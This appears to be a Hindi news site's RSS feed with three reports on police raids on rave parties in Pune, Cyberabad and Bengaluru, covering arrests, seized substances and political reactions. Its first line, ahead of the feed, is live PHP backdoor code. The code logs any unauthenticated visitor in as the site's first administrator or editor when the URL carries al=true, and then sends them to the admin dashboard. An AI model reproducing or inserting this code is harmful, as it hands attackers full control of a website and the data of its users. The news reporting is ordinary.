// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); rave party – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sun, 27 Jul 2025 12:34:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 रेव पार्टी कांड में फंसे पूर्व मंत्री के दामाद, पुणे से 7 गिरफ्तारियों से मचा सियासी भूचाल https://pratyushaashakinayikiran.com/?p=173682 Sun, 27 Jul 2025 12:34:00 +0000 https://pratyushaashakinayikiran.com/?p=173682 पुणे

महाराष्ट्र के पुणे शहर में पुलिस ने एक फ्लैट में चल रही कथित 'ड्रग पार्टी' पर रविवार तड़के छापा मारकर 7 लोगों को गिरफ्तार किया है. गिरफ्तार किए गए लोगों में पूर्व मंत्री एकनाथ खडसे के दामाद प्रांजल खेवळकर भी शामिल हैं. इस मामले को लेकर सियासी बयानबाजी भी शुरू हो गई है. सूत्रों ने पार्टी में एक महिला विधायक के पति की मौजूदगी का भी खुलासा किया है. कुख्यात सट्टेबाज निखिल पोपटानी के भी इस आयोजन से जुड़े होने की खबर है.

ड्रग्स, शराब और हुक्का पार्टी चल रही थी
पुलिस के अनुसार, यह छापा पुणे के पॉश इलाके खराड़ी में एक स्टूडियो अपार्टमेंट में मारा गया, जहां ड्रग्स, शराब और हुक्का पार्टी चल रही थी. क्राइम ब्रांच को गुप्त सूचना मिली थी कि यहां रेव पार्टी आयोजित की जा रही है. इसके बाद रविवार तड़के करीब 3:30 बजे छापा मारा गया.

ये लोग भी पकड़ाए
पुणे पुलिस के डिप्टी कमिश्नर (क्राइम) निखिल पिंगले ने प्रेस कॉन्फ्रेंस में बताया कि तलाशी के दौरान 2.7 ग्राम कोकीन जैसा पदार्थ, 70 ग्राम गांजा जैसा पदार्थ, एक हुक्का पॉट, हुक्का फ्लेवर और बीयर व शराब की बोतलें बरामद की गई हैं. उन्होंने बताया कि इस मामले में जिन 7 लोगों को गिरफ्तार किया गया है, उनमें प्रांजल खेवळकर, निखिल पोपतानी, समीर सय्यद, श्रीपद यादव, सचिन भोम्बे, ईशा सिंह और प्राची शर्मा के नाम शामिल हैं.

इन सभी आरोपियों पर एनडीपीएस एक्ट के तहत कार्रवाई की गई है और उन्हें मेडिकल जांच के लिए भेजा गया है. जांच रिपोर्ट का इंतजार किया जा रहा है.

राजनीतिक बयानबाजी शुरू
इस पूरे मामले पर राजनीतिक बयान भी आने लगे हैं. एनसीपी (शरद पवार गुट) के नेता एकनाथ खडसे ने कहा कि इस मामले की निष्पक्ष जांच होनी चाहिए और यह भी देखा जाना चाहिए कि क्या यह कार्रवाई किसी राजनीतिक साजिश के तहत की गई है.

गौरतलब है कि खडसे की बेटी रोहिणी खडसे एनसीपी (एसपी) महिला मोर्चा की प्रदेश अध्यक्ष हैं. ऐसे में उनके पति की गिरफ्तारी को लेकर राजनीति गरमा गई है.

शिवसेना (उद्धव गुट) की नेता सुषमा अंधारे ने भी सरकार पर हमला बोलते हुए कहा कि यह कार्रवाई उन लोगों के लिए संदेश है जो सरकार के खिलाफ बोलते हैं. फिलहाल पुलिस इस मामले की गहन जांच कर रही है और आरोपियों के मेडिकल रिपोर्ट आने के बाद आगे की कार्रवाई की जाएगी.

]]>
तेलंगाना के साइबराबाद में रेव पार्टी का खुलासा, 21 लड़के, 14 लड़कियां पकड़ी https://pratyushaashakinayikiran.com/?p=90540 Sun, 27 Oct 2024 16:06:00 +0000 https://pratyushaashakinayikiran.com/?p=90540 हैदराबाद
तेलंगाना के साइबराबाद में रेव पार्टी का खुलासा हुआ है. एक हाई प्रोफाइल छापेमारी में फॉर्महाउस पर रेव पार्टी करते गुए 35 लोगों को हिरासत में लिया गया है. इस रेव पार्टी के तार KTR के करीबी से जुड़ रहे हैं.

जानकारी के मुताबिक, तेलंगाना के पूर्व मंत्री केटी रामाराव (KTR) के रिश्तेदार माने जाने वाले राज पाकला के जणवाड़ा फार्महाउस पर एक हाई-प्रोफाइल छापेमारी में अवैध शराब और नशीले पदार्थों के इस्तेमाल का खुलासा हुआ है. नरसिंगी पुलिस, विशेष अभियान दल (SOT), और आबकारी अधिकारियों द्वारा संयुक्त रूप से यह कार्रवाई की गई. बताया गया कि मकिला पुलिस स्टेशन क्षेत्र के अंतर्गत स्थित इस फार्महाउस में एक रेव पार्टी की सूचना मिलने पर छापेमारी कई गई थी.

देर रात हुए इस छापे में अधिकारियों ने पार्टी में मौजूद 35 लोगों को हिरासत में लिया, जिसमें 21 पुरुष और 14 महिलाएं शामिल थीं. छानबीन के दौरान 10.5 लीटर विदेशी शराब की सात बोतलें और दस भारतीय शराब की बोतलें भी बरामद की गईं, जिनके लिए कोई लाइसेंस नहीं था. यह राज्य के आबकारी कानूनों का उल्लंघन है.

अधिकारियों ने संदेह के आधार पर पार्टी में मौजूद लोगों का ड्रग टेस्ट किया, जिसमें विजय मड्डूरी नाम के एक शख्स को कोकीन पॉजिटिव पाया गया. मड्डूरी को आगे के परीक्षणों के लिए अस्पताल भेजा गया और उसके खिलाफ एनडीपीएस एक्ट की धारा 27 के तहत मुकदमा दर्ज किया गया है.

फार्महाउस के मालिक राज पाकला पर बिना लाइसेंस के शराब परोसने के आरोप में आबकारी अधिनियम की धारा 34(A), 34(1) और धारा 9 के तहत केस दर्ज किया गया है. इस घटना के बाद फार्महाउस पर अवैध शराब आपूर्ति और मादक पदार्थों के इस्तेमाल की गहन जांच शुरू कर दी गई है, और आगे की कानूनी कार्रवाई की जा रही है.

]]>
रेव पार्टी को लेकर बीजेपी का सिद्धारमैया सरकार पर हमला, भाजपा ने इसके लिए ‘उड़ता बेंगलुरू’ शब्द का भी इस्तेमाल किया https://pratyushaashakinayikiran.com/?p=33834 Fri, 24 May 2024 19:45:00 +0000 https://pratyushaashakinayikiran.com/?p=33834 बेंगलुरु
कर्नाटक में कानून व्यवस्था की कथित खराब स्थिति के लिए सिद्धरमैया के नेतृत्व वाली कांग्रेस सरकार को जिम्मेदार ठहराते हुए भारतीय जनता पार्टी (BJP) ने आरोप लगाया कि राज्य की राजधानी मादक पदार्थों और रेव पार्टियों का अड्डा बनती जा रही है। भाजपा ने इसके लिए ‘उड़ता बेंगलुरू’ शब्द का भी इस्तेमाल किया।

बेंगलुरु पुलिस द्वारा हाल में एक फार्महाउस में रेव पार्टी का भंडाफोड़ करने के बाद भाजपा ने राज्य की कांग्रेस सरकार पर निशाना साधा है। इस रेव पार्टी में कथित तौर पर एक तेलुगू फिल्म अभिनेत्री सहित 86 लोग शामिल हुए थे।भाजपा ने 'एक्स' पर एक पोस्ट में आरोप लगाया है कि जब से कर्नाटक में कांग्रेस सरकार सत्ता में आई है तब से बेंगलुरु में हर जगह "अनैतिक आयोजन" हो रहे हैं।

कर्नाटक भाजपा ने कन्नड भाषा में किए एक पोस्ट में कहा, "कानून व्यवस्था की स्थिति खराब हो गई है और सरकारी अव्यवस्था उजागर हो गई है। कांग्रेस सरकार के सत्ता में आने के बाद बेंगलुरु में हर जगह अनैतिक आयोजन हो रहे हैं। ‘सिलिकॉन सिटी’ अब मादक पदार्थ, गांजा और रेव पार्टियों का अड्डा बन गया है।’

भाजपा ने राज्य सरकार पर निशाना साधने के लिए ‘हैशटैग बैड बेंगलुरु’ और ‘हैशटैग कांग्रेसफेल्सकर्नाटक’ के साथ मुख्यमंत्री सिद्धरमैया और उपमुख्यमंत्री डीके शिवकुमार की तस्वीरों वाला एक पोस्टर भी जारी किया। भाजपा ने 'एक्स' पर साझा किए गए पोस्टर में राज्य की राजधानी को "उड़ता बेंगलुरु" करार देते हुए आरोप लगाया, ‘"सिलिकॉन सिटी मादक पदार्थों का ‘अड्डा’ बन रही है और यहां बड़े पैमाने पर रेव पार्टियां हो रही हैं।’ भाजपा ने 2016 में आई हिंदी फिल्म "उड़ता पंजाब" के संदर्भ में "उड़ता बेंगलुरु" शब्द का इस्तेमाल किया। ‘उड़ता पंजाब’ फिल्म में युवाओं के नशीले पदार्थों के इस्तेमाल के बारे में दिखाया गया था।

]]>